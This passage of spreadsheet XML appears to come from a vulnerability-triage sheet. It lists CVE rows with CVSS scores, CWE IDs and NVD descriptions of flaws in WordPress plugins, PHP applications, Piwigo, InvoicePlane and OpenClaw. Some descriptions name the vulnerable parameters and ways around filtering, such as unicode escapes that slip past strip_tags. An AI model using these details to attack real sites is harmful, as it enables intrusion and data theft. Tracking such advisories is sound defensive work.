      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to bind working directory context to reusable exec approvals, allowing approved commands to execute in different directories. Attackers with an allow-always approval can reuse it to run the same command against unreviewed files or repositories with materially different effects.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100530</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93901</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>php, express, gin, hp</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>The Optima Express IDX plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 8.7.5. This is due to the `provisionBlogCredentials()` function in `iHomefinderAdmin.php` being reachable via the `wp_ajax_nopriv_ihf_clear_cache` AJAX action — through the call chain `iHomefinderAjaxHandler::clearCache()` → `activateAuthenticationToken()` → `getAuthenticationInfo()` → `provisionBlogCredentials()` — with no capability check, nonce verification, or ownership validation, and the function unconditionally calling `$user-&gt;set_role('author')` on whichever WordPress account matches the hard-coded login `optima-express` via `get_user_by('login', 'optima-express')`. This makes it possible for unauthenticated attackers to escalate a pre-registered `optima-express` account to the Author role, gaining `publish_posts`, `upload_files`, and `edit_published_posts` capabilities, including access to the plugin's own `/wp-json/optima-express/v1/blog-post` REST endpoint. Exploitation requires open user registration to be enabled on the target site, and the attacker must register the `optima-express` username before the plugin has had the opportunity to provision that login for its own integration account.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93901</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97865</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Open-Web-Analytics up to 1.8.1. Affected is the function Event::loadFromArray of the file queue.php of the component Remote Event Queue Endpoint. Performing a manipulation results in deserialization. The attack can be initiated remotely. Upgrading to version 1.8.2 is able to address this issue. The patch is named 78c1222ec0e2119d84684032da1541120a2cdd23. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97865</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97871</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Zhonglun CloudPos up to 3.0.1.76. This issue affects the function OpenLocalBrowser of the file ZlPos/ZlPos/Bizlogic/JSBridge.cs of the component JSBridge. Such manipulation of the argument url leads to code injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97871</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97882</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. The impacted element is an unknown function of the file loginlinkfaculty.php of the component Faculty Authentication. Executing a manipulation of the argument fid/pass can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97882</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97883</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This affects an unknown function of the file updatequery.php. The manipulation of the argument gid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97883</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97885</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected is an unknown function of the file updatefaculty.php. This manipulation of the argument fid causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97885</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100372</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>ClipBucket v5 before 5.5.3-#197 contains a path traversal vulnerability in the admin template editor that allows authenticated administrators to overwrite PHP files by supplying directory traversal sequences in the folder parameter. Attackers with manage_template_access permission can traverse outside the layout directory to modify executable PHP files and achieve remote code execution as the web server user.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100372</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33639</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane interpolates the administrator-controlled tax_rate_decimal_places setting into an ALTER TABLE statement for ip_tax_rates in Settings::index() without strict integer validation. A crafted setting value can add clauses to the schema-changing statement and remove or alter required database columns. The resulting schema corruption can permanently modify financial data structures and make the application unavailable. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33639</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42323</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/batch_manager.php accepts administrator-controlled dimension width, height, and ratio values and filesize values from the Batch Manager filter URL without numeric validation. The URL filter parser stores those values in the bulk_manager_filter session state, and later query construction concatenates them into SQL predicates, unlike the validated POST filter path. An authenticated administrator can use crafted filter values to execute time-based or other SQL expressions and potentially disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42323</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42324</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/element_set_ranks.php stores administrator-controlled image_order[] values without enforcing the existing sort-field whitelist. The stored album image_order expression is later concatenated into ORDER BY clauses by admin/batch_manager_global.php, admin/batch_manager_unit.php, include/section_init.inc.php, and include/ws_functions/pwg.categories.php. When at least one album contains at least one photo, an authenticated administrator can store a crafted expression and trigger it in a later album or Batch Manager query to disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42324</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83591</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via Regex Transformation in all versions up to, and including, 1.1.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The crafted payload uses only WordPress-permitted comment tags and attributes (an anchor with href and title), and the AMP sanitizer pipeline omits javascript: protocol blocking, meaning neither the comment save filter nor the AMP output stage removes the malicious URI introduced by the transformation.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83591</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84279</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'output_format' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the Pro Export/Genius feature to be enabled on the site, as the vulnerable fpd_pr_export AJAX action is only registered when that feature is active.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84279</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84280</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Order 'elements[].title' Parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload is written to the DOM via innerHTML within the beforeElementAdd JavaScript event handler when processing the elements[].title field from the stored order JSON, meaning execution occurs specifically when an administrator reviews shortcode orders in the WordPress admin panel.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84280</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84281</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'productTitle' in '_fpd_data' Order Item Meta in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The fpd_save_order AJAX action is registered for unauthenticated users via wp_ajax_nopriv_fpd_save_order with no nonce or capability check, and the strip_tags() sanitization applied at save time is bypassed by submitting JSON unicode escape sequences (e.g. \u003c, \u003e), which json_decode() silently converts back to literal angle brackets when the order is rendered in the admin view.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84281</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84862</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.2</v>
      </c>
